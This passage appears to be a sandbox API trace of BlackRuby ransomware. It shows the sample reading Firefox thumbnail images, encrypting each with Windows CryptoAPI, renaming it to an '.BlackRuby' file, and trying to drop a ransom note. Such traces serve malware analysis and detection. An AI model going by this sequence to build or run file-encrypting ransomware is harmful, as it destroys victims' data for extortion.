lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", nBufferLength=0x105, lpBuffer=0x18e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", lpFilePart=0x0) returned 0x78 [0049.672] GetLastError () returned 0x0 [0049.672] SetErrorMode (uMode=0x1) returned 0x0 [0049.672] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png"), fInfoLevelId=0x0, lpFileInformation=0x18eb64 | out: lpFileInformation=0x18eb64*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc35ddb70, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc35ddb70, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc35ddb70, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x492a)) returned 1 [0049.672] GetLastError () returned 0x0 [0049.672] SetErrorMode (uMode=0x0) returned 0x1 [0049.672] CryptAcquireContextW (in: phProv=0x18eac4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eac4*=0x37c790) returned 1 [0049.673] GetLastError () returned 0x0 [0049.711] CryptImportKey (in: hProv=0x37c790, pbData=0x1bca884, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eaa0 | out: phKey=0x18eaa0*=0x360ae0) returned 1 [0049.711] GetLastError () returned 0x0 [0049.711] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.711] GetLastError () returned 0x0 [0049.716] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.716] GetLastError () returned 0x0 [0049.716] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ea5c | out: phKey=0x18ea5c*=0x360fa0) returned 1 [0049.716] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.716] GetLastError () returned 0x0 [0049.716] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1bf78d0*=0x1, dwFlags=0x0) returned 1 [0049.716] GetLastError () returned 0x0 [0049.716] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1bf789c, dwFlags=0x0) returned 1 [0049.716] GetLastError () returned 0x0 [0049.716] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bf7918*, pdwDataLen=0x18eaec*=0x4a20, dwBufLen=0x4a20 | out: pbData=0x1bf7918*, pdwDataLen=0x18eaec*=0x4a20) returned 1 [0049.716] GetLastError () returned 0x0 [0049.716] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c00d84*, pdwDataLen=0x18eb04*=0x10, dwBufLen=0x10 | out: pbData=0x1c00d84*, pdwDataLen=0x18eb04*=0x10) returned 1 [0049.716] GetLastError () returned 0x0 [0049.716] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c00db4*, pdwDataLen=0x18eb0c*=0x0, dwBufLen=0x10 | out: pbData=0x1c00db4*, pdwDataLen=0x18eb0c*=0x10) returned 1 [0049.716] GetLastError () returned 0x0 [0049.717] CryptDestroyKey (hKey=0x360ae0) returned 1 [0049.717] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.717] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0049.717] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", nBufferLength=0x105, lpBuffer=0x18e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", lpFilePart=0x0) returned 0x78 [0049.717] GetLastError () returned 0x0 [0049.717] SetErrorMode (uMode=0x1) returned 0x0 [0049.717] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.718] GetLastError () returned 0xb7 [0049.718] GetFileType (hFile=0x184) returned 0x1 [0049.718] SetErrorMode (uMode=0x0) returned 0x1 [0049.718] GetFileType (hFile=0x184) returned 0x1 [0049.719] CloseHandle (hObject=0x184) returned 1 [0049.719] GetLastError () returned 0xb7 [0049.719] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png", lpFilePart=0x0) returned 0x78 [0049.719] GetLastError () returned 0xb7 [0049.719] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_QK1ABwgaAXCVvgAqtfJI08Jg7Emn7rue6B61p3ufJOOwH2a.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_QK1ABwgaAXCVvgAqtfJI08Jg7Emn7rue6B61p3ufJOOwH2a.BlackRuby", lpFilePart=0x0) returned 0x97 [0049.719] GetLastError () returned 0xb7 [0049.720] SetErrorMode (uMode=0x1) returned 0x0 [0049.720] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png"), fInfoLevelId=0x0, lpFileInformation=0x18eb4c | out: lpFileInformation=0x18eb4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc35ddb70, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc35ddb70, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x25d56f80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4a30)) returned 1 [0049.720] GetLastError () returned 0xb7 [0049.720] SetErrorMode (uMode=0x0) returned 0x1 [0049.720] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\a1d1a508444ac649673a66fafc239be9.png"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_QK1ABwgaAXCVvgAqtfJI08Jg7Emn7rue6B61p3ufJOOwH2a.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\encrypted_qk1abwgaaxcvvgaqtfji08jg7emn7rue6b61p3ufjoowh2a.blackruby")) returned 1 [0049.720] GetLastError () returned 0xb7 [0049.721] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.721] GetLastError () returned 0xb7 [0049.721] SetErrorMode (uMode=0x1) returned 0x0 [0049.721] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.721] GetLastError () returned 0x5 [0049.722] SetErrorMode (uMode=0x0) returned 0x1 [0049.722] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", lpFilePart=0x0) returned 0x78 [0049.722] GetLastError () returned 0x5 [0049.722] SetErrorMode (uMode=0x1) returned 0x0 [0049.722] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), fInfoLevelId=0x0, lpFileInformation=0x1c2c3fc | out: lpFileInformation=0x1c2c3fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74a31b90, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x74a31b90, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x74a31b90, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x326b)) returned 1 [0049.722] GetLastError () returned 0x5 [0049.722] SetErrorMode (uMode=0x0) returned 0x1 [0049.722] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", lpFilePart=0x0) returned 0x78 [0049.722] GetLastError () returned 0x5 [0049.722] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", nBufferLength=0x105, lpBuffer=0x18e5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", lpFilePart=0x0) returned 0x78 [0049.722] GetLastError () returned 0x5 [0049.722] SetErrorMode (uMode=0x1) returned 0x0 [0049.722] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.722] GetLastError () returned 0x0 [0049.722] GetFileType (hFile=0x184) returned 0x1 [0049.722] SetErrorMode (uMode=0x0) returned 0x1 [0049.722] GetFileType (hFile=0x184) returned 0x1 [0049.723] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eb54 | out: lpFileSizeHigh=0x18eb54*=0x0) returned 0x326b [0049.723] GetLastError () returned 0x0 [0049.723] ReadFile (in: hFile=0x184, lpBuffer=0x1c2e5e0, nNumberOfBytesToRead=0x326b, lpNumberOfBytesRead=0x18eafc, lpOverlapped=0x0 | out: lpBuffer=0x1c2e5e0*, lpNumberOfBytesRead=0x18eafc*=0x326b, lpOverlapped=0x0) returned 1 [0049.731] GetLastError () returned 0x0 [0049.731] CloseHandle (hObject=0x184) returned 1 [0049.731] GetLastError () returned 0x0 [0049.731] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", nBufferLength=0x105, lpBuffer=0x18e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", lpFilePart=0x0) returned 0x78 [0049.731] GetLastError () returned 0x0 [0049.731] SetErrorMode (uMode=0x1) returned 0x0 [0049.731] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), fInfoLevelId=0x0, lpFileInformation=0x18eb64 | out: lpFileInformation=0x18eb64*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74a31b90, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x74a31b90, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x74a31b90, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x326b)) returned 1 [0049.731] GetLastError () returned 0x0 [0049.731] SetErrorMode (uMode=0x0) returned 0x1 [0049.742] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c8ef3c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eaa0 | out: phKey=0x18eaa0*=0x360c20) returned 1 [0049.742] GetLastError () returned 0x0 [0049.742] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.742] GetLastError () returned 0x0 [0049.747] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.747] GetLastError () returned 0x0 [0049.747] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ea5c | out: phKey=0x18ea5c*=0x360ee0) returned 1 [0049.748] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.748] GetLastError () returned 0x0 [0049.748] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1cbbf88*=0x1, dwFlags=0x0) returned 1 [0049.748] GetLastError () returned 0x0 [0049.748] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1cbbf54, dwFlags=0x0) returned 1 [0049.748] GetLastError () returned 0x0 [0049.748] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cbbfd0*, pdwDataLen=0x18eaec*=0x3360, dwBufLen=0x3360 | out: pbData=0x1cbbfd0*, pdwDataLen=0x18eaec*=0x3360) returned 1 [0049.748] GetLastError () returned 0x0 [0049.748] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc26bc*, pdwDataLen=0x18eb04*=0x10, dwBufLen=0x10 | out: pbData=0x1cc26bc*, pdwDataLen=0x18eb04*=0x10) returned 1 [0049.748] GetLastError () returned 0x0 [0049.748] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cc26ec*, pdwDataLen=0x18eb0c*=0x0, dwBufLen=0x10 | out: pbData=0x1cc26ec*, pdwDataLen=0x18eb0c*=0x10) returned 1 [0049.748] GetLastError () returned 0x0 [0049.748] CryptDestroyKey (hKey=0x360c20) returned 1 [0049.748] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0049.748] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0049.748] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", nBufferLength=0x105, lpBuffer=0x18e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png", lpFilePart=0x0) returned 0x78 [0049.748] GetLastError () returned 0x0 [0049.748] SetErrorMode (uMode=0x1) returned 0x0 [0049.749] GetFileType (hFile=0x184) returned 0x1 [0049.749] GetFileType (hFile=0x184) returned 0x1 [0049.750] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_uMRbFAINPxNohnWKxNifblJqcPoBq8VzfBoClpg3oRW0lS.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\encrypted_umrbfainpxnohnwkxnifbljqcpobq8vzfboclpg3orw0ls.blackruby")) returned 1 [0049.751] GetLastError () returned 0xb7 [0049.752] SetErrorMode (uMode=0x0) returned 0x1 [0049.753] GetFileType (hFile=0x184) returned 0x1 [0049.753] GetFileType (hFile=0x184) returned 0x1 [0049.753] ReadFile (in: hFile=0x184, lpBuffer=0x2f07590, nNumberOfBytesToRead=0x18605, lpNumberOfBytesRead=0x18eafc, lpOverlapped=0x0 | out: lpBuffer=0x2f07590*, lpNumberOfBytesRead=0x18eafc*=0x18605, lpOverlapped=0x0) returned 1 [0049.762] GetLastError () returned 0x0 [0049.799] CryptImportKey (in: hProv=0x37c680, pbData=0x1b4cd34, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eaa0 | out: phKey=0x18eaa0*=0x360b20) returned 1 [0049.799] GetLastError () returned 0x0 [0049.799] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.799] GetLastError () returned 0x0 [0049.804] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.804] GetLastError () returned 0x0 [0049.804] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ea5c | out: phKey=0x18ea5c*=0x360ee0) returned 1 [0049.804] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0049.804] GetLastError () returned 0x0 [0049.804] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1b79d80*=0x1, dwFlags=0x0) returned 1 [0049.804] GetLastError () returned 0x0 [0049.804] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1b79d4c, dwFlags=0x0) returned 1 [0049.804] GetLastError () returned 0x0 [0049.804] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f382e0*, pdwDataLen=0x18eaec*=0x18700, dwBufLen=0x18700 | out: pbData=0x2f382e0*, pdwDataLen=0x18eaec*=0x18700) returned 1 [0049.805] GetLastError () returned 0x0 [0049.806] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b79ddc*, pdwDataLen=0x18eb04*=0x10, dwBufLen=0x10 | out: pbData=0x1b79ddc*, pdwDataLen=0x18eb04*=0x10) returned 1 [0049.806] GetLastError () returned 0x0 [0049.806] CryptEncrypt (in: hKey=0x360ee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b79e0c*, pdwDataLen=0x18eb0c*=0x0, dwBufLen=0x10 | out: pbData=0x1b79e0c*, pdwDataLen=0x18eb0c*=0x10) returned 1 [0049.806] GetLastError () returned 0x0 [0049.808] CryptDestroyKey (hKey=0x360b20) returned 1 [0049.808] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0049.808] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0049.808] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png", nBufferLength=0x105, lpBuffer=0x18e5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png", lpFilePart=0x0) returned 0x78 [0049.808] GetLastError () returned 0x0 [0049.808] SetErrorMode (uMode=0x1) returned 0x0 [0049.808] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.809] GetLastError () returned 0xb7 [0049.809] GetFileType (hFile=0x184) returned 0x1 [0049.810] SetErrorMode (uMode=0x0) returned 0x1 [0049.810] GetFileType (hFile=0x184) returned 0x1 [0049.812] CloseHandle (hObject=0x184) returned 1 [0049.812] GetLastError () returned 0xb7 [0049.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png", lpFilePart=0x0) returned 0x78 [0049.812] GetLastError () returned 0xb7 [0049.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_125bL4qDqna8pUsMBDimD10tY42koYfSR1Ast.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_125bL4qDqna8pUsMBDimD10tY42koYfSR1Ast.BlackRuby", lpFilePart=0x0) returned 0x8d [0049.812] GetLastError () returned 0xb7 [0049.812] SetErrorMode (uMode=0x1) returned 0x0 [0049.812] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), fInfoLevelId=0x0, lpFileInformation=0x18eb4c | out: lpFileInformation=0x18eb4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a541c90, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8a541c90, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x25e3b7c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x18710)) returned 1 [0049.812] GetLastError () returned 0xb7 [0049.812] SetErrorMode (uMode=0x0) returned 0x1 [0049.812] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\Encrypted_125bL4qDqna8pUsMBDimD10tY42koYfSR1Ast.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\encrypted_125bl4qdqna8pusmbdimd10ty42koyfsr1ast.blackruby")) returned 1 [0049.813] GetLastError () returned 0xb7 [0049.813] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.813] GetLastError () returned 0xb7 [0049.813] SetErrorMode (uMode=0x1) returned 0x0 [0049.813] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.813] GetLastError () returned 0x5 [0049.814] SetErrorMode (uMode=0x0) returned 0x1 [0049.814] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png", lpFilePart=0x0) returned 0x78 [0049.814] GetLastError () returned 0x5 [0049.814] SetErrorMode (uMode=0x1) returned 0x0 [0049.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\thumbnails\\d2ea1355d529838a6539b19e2bc342fe.png"), fInfoLevelId=0x0, lpFileInformation=0x1b975a4 | out: lpFileInformation=0x1b975a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc5d96a90, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xcae5f530, ftLastAccessTime.dwHighDateTime=0x1d2da1b, 